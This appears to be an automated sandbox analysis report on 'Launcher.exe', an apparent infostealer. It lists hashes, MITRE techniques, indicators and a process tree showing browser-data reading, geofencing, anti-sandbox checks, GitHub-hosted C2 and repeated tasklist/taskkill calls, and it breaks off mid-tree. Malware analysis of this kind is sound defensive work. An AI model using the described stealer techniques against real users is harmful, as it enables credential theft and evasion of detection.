088a9f665d0fdc9b2bb050ecd1524b1539010bbe1d9935f72343bb2bc5f98975

Resubmissions

28-04-2024 15:54

240428-tccmzabc26 7

28-04-2024 14:49

240428-r62svaab66 7

Analysis

max time kernel
151s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
28-04-2024 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

164.9MB
MD5

69297f39ec0be1969de6409a310264d1
SHA1

7c0e7ead5bd451a95cd6062eb0fb4a5c053f7190
SHA256

22117115927d13aee3314c659efe6253692ec3555b2b3e602d512067d71e0b98
SHA512

2c6b82ee7d76d227b35e75aed7521a6d939a1f8abe8a031202ec2c56832a3c131a82b006e53be05e0937b461e3a0cdeff8f1f71f1e4e61fb01bc592cd0ee5b57
SSDEEP

1572864:Ftc2cEGwGrRSREICCr3ka8YrcSAfII01aLadS5sDNd+Ipx9cF3LfxNEK2Ho8jlgY:b+CHrJIgIsV

Score

7^/10

spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	Launcher.exe

Loads dropped DLL 2 IoCs

Processes:

Launcher.exe

pid process

2888 Launcher.exe
2888 Launcher.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

Processes:

flow	ioc
61	raw.githubusercontent.com
63	raw.githubusercontent.com
64	raw.githubusercontent.com
72	raw.githubusercontent.com
44	raw.githubusercontent.com
46	raw.githubusercontent.com
47	raw.githubusercontent.com
42	raw.githubusercontent.com
45	raw.githubusercontent.com
73	raw.githubusercontent.com
41	raw.githubusercontent.com
43	raw.githubusercontent.com
48	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ipinfo.io
24 ipinfo.io

flow	ioc
23	ipinfo.io
24	ipinfo.io

Drops file in System32 directory 2 IoCs

Processes:

Launcher.exe

description	ioc	process
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	Launcher.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	Launcher.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Launcher.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Launcher.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Launcher.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Launcher.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Launcher.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Launcher.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Launcher.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Launcher.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

10848 WMIC.exe

pid	process
10848	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
8808	tasklist.exe
7756	tasklist.exe
7264	tasklist.exe
7852	tasklist.exe
9300	tasklist.exe
6520	tasklist.exe
4372	tasklist.exe
8412	tasklist.exe
7160	tasklist.exe
8568	tasklist.exe
8248	tasklist.exe
8076	tasklist.exe
6280	tasklist.exe
512	tasklist.exe
7716	tasklist.exe
7824	tasklist.exe
9536	tasklist.exe
7960	tasklist.exe
4356	tasklist.exe
7376	tasklist.exe
7564	tasklist.exe
7888	tasklist.exe
8256	tasklist.exe
8232	tasklist.exe
7940	tasklist.exe
6888	tasklist.exe
7200	tasklist.exe
8464	tasklist.exe
7964	tasklist.exe
2168	tasklist.exe
9652	tasklist.exe
8280	tasklist.exe
5664	tasklist.exe
7304	tasklist.exe
7736	tasklist.exe
7296	tasklist.exe
8028	tasklist.exe
8012	tasklist.exe
8560	tasklist.exe
8180	tasklist.exe
3152	tasklist.exe
7804	tasklist.exe
7820	tasklist.exe
8536	tasklist.exe
7524	tasklist.exe
7588	tasklist.exe
7960	tasklist.exe
9936	tasklist.exe
7468	tasklist.exe
7400	tasklist.exe
7364	tasklist.exe
8004	tasklist.exe
10356	tasklist.exe
9432	tasklist.exe
5668	tasklist.exe
10840	tasklist.exe
5460	tasklist.exe
8196	tasklist.exe
1064	tasklist.exe
6176	tasklist.exe
8916	tasklist.exe
10328	tasklist.exe
4364	tasklist.exe
6420	tasklist.exe

Kills process with taskkill 25 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
7472	taskkill.exe
5984	taskkill.exe
4920	taskkill.exe
10048	taskkill.exe
4524	taskkill.exe
6748	taskkill.exe
10284	taskkill.exe
7864	taskkill.exe
8096	taskkill.exe
7968	taskkill.exe
10248	taskkill.exe
8804	taskkill.exe
8376	taskkill.exe
7580	taskkill.exe
5404	taskkill.exe
10320	taskkill.exe
8668	taskkill.exe
9448	taskkill.exe
7932	taskkill.exe
6704	taskkill.exe
6448	taskkill.exe
10276	taskkill.exe
4364	taskkill.exe
3672	taskkill.exe
5852	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

Launcher.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeLauncher.exe

pid	process
2888	Launcher.exe
2888	Launcher.exe
2888	Launcher.exe
2888	Launcher.exe
2888	Launcher.exe
2888	Launcher.exe
10940	powershell.exe
10940	powershell.exe
10940	powershell.exe
11124	powershell.exe
11124	powershell.exe
11124	powershell.exe
5136	powershell.exe
5136	powershell.exe
208	powershell.exe
208	powershell.exe
5136	powershell.exe
8608	powershell.exe
8608	powershell.exe
208	powershell.exe
8608	powershell.exe
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
5200	powershell.exe
5200	powershell.exe
5200	powershell.exe
8920	powershell.exe
8920	powershell.exe
8920	powershell.exe
4680	Launcher.exe
4680	Launcher.exe
4680	Launcher.exe
4680	Launcher.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exeLauncher.exeWMIC.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	1112	tasklist.exe
Token: SeShutdownPrivilege	2888	Launcher.exe
Token: SeCreatePagefilePrivilege	2888	Launcher.exe
Token: SeIncreaseQuotaPrivilege	3564	WMIC.exe
Token: SeSecurityPrivilege	3564	WMIC.exe
Token: SeTakeOwnershipPrivilege	3564	WMIC.exe
Token: SeLoadDriverPrivilege	3564	WMIC.exe
Token: SeSystemProfilePrivilege	3564	WMIC.exe
Token: SeSystemtimePrivilege	3564	WMIC.exe
Token: SeProfSingleProcessPrivilege	3564	WMIC.exe
Token: SeIncBasePriorityPrivilege	3564	WMIC.exe
Token: SeCreatePagefilePrivilege	3564	WMIC.exe
Token: SeBackupPrivilege	3564	WMIC.exe
Token: SeRestorePrivilege	3564	WMIC.exe
Token: SeShutdownPrivilege	3564	WMIC.exe
Token: SeDebugPrivilege	3564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3564	WMIC.exe
Token: SeRemoteShutdownPrivilege	3564	WMIC.exe
Token: SeUndockPrivilege	3564	WMIC.exe
Token: SeManageVolumePrivilege	3564	WMIC.exe
Token: 33	3564	WMIC.exe
Token: 34	3564	WMIC.exe
Token: 35	3564	WMIC.exe
Token: 36	3564	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3564	WMIC.exe
Token: SeSecurityPrivilege	3564	WMIC.exe
Token: SeTakeOwnershipPrivilege	3564	WMIC.exe
Token: SeLoadDriverPrivilege	3564	WMIC.exe
Token: SeSystemProfilePrivilege	3564	WMIC.exe
Token: SeSystemtimePrivilege	3564	WMIC.exe
Token: SeProfSingleProcessPrivilege	3564	WMIC.exe
Token: SeIncBasePriorityPrivilege	3564	WMIC.exe
Token: SeCreatePagefilePrivilege	3564	WMIC.exe
Token: SeBackupPrivilege	3564	WMIC.exe
Token: SeRestorePrivilege	3564	WMIC.exe
Token: SeShutdownPrivilege	3564	WMIC.exe
Token: SeDebugPrivilege	3564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3564	WMIC.exe
Token: SeRemoteShutdownPrivilege	3564	WMIC.exe
Token: SeUndockPrivilege	3564	WMIC.exe
Token: SeManageVolumePrivilege	3564	WMIC.exe
Token: 33	3564	WMIC.exe
Token: 34	3564	WMIC.exe
Token: 35	3564	WMIC.exe
Token: 36	3564	WMIC.exe
Token: SeShutdownPrivilege	2888	Launcher.exe
Token: SeCreatePagefilePrivilege	2888	Launcher.exe
Token: SeDebugPrivilege	7184	tasklist.exe
Token: SeDebugPrivilege	7052	tasklist.exe
Token: SeDebugPrivilege	5460	tasklist.exe
Token: SeDebugPrivilege	7200	tasklist.exe
Token: SeDebugPrivilege	7296	tasklist.exe
Token: SeDebugPrivilege	7400	tasklist.exe
Token: SeDebugPrivilege	7468	tasklist.exe
Token: SeDebugPrivilege	7476	tasklist.exe
Token: SeDebugPrivilege	7288	tasklist.exe
Token: SeDebugPrivilege	7304	tasklist.exe
Token: SeDebugPrivilege	7280	tasklist.exe
Token: SeDebugPrivilege	7364	tasklist.exe
Token: SeShutdownPrivilege	2888	Launcher.exe
Token: SeCreatePagefilePrivilege	2888	Launcher.exe
Token: SeDebugPrivilege	7320	tasklist.exe
Token: SeDebugPrivilege	7148	tasklist.exe
Token: SeDebugPrivilege	7524	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.execmd.execmd.exe

description	pid	process	target process
PID 2888 wrote to memory of 4380	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4380	2888	Launcher.exe	cmd.exe
PID 4380 wrote to memory of 1112	4380	cmd.exe	tasklist.exe
PID 4380 wrote to memory of 1112	4380	cmd.exe	tasklist.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 3972	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 4452	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 4452	2888	Launcher.exe	Launcher.exe
PID 2888 wrote to memory of 2668	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 2668	2888	Launcher.exe	cmd.exe
PID 2668 wrote to memory of 3564	2668	cmd.exe	WMIC.exe
PID 2668 wrote to memory of 3564	2668	cmd.exe	WMIC.exe
PID 2888 wrote to memory of 2508	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 2508	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4084	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4084	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 776	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 776	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4636	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4636	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4872	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4872	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 5032	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 5032	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 3892	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 3892	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 3112	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 3112	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 2520	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 2520	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4968	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 4968	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 1608	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 1608	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 1992	2888	Launcher.exe	cmd.exe
PID 2888 wrote to memory of 1992	2888	Launcher.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\theonlyscript" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1828 --field-trial-handle=1832,i,18116785064954537092,7766284800993023191,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
2⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\theonlyscript" --mojo-platform-channel-handle=2184 --field-trial-handle=1832,i,18116785064954537092,7766284800993023191,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
2⤵
PID:4452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2888 get ExecutablePath"
2⤵
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=2888 get ExecutablePath
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2508

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4084

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:776

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4636

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4872

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5032

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3892

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3112

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2520

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4968

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1608

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1992

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:864

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4696

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3224

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2696

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3220

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3720

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3552

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3016

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4352

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4376

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:656

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4364

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:468

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:380

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2264

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2820

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:372

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4004

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3628

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3632

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3404

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4268

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1364

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3620

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2460

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4708

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4796

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3392

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:408

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3152

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3820

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4828

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1336

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4544

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4104

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1468

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4116

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4316

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3248

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:884

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4648

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2012

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4092

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2308

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7400

C:\Windows\system32\cmd.exe
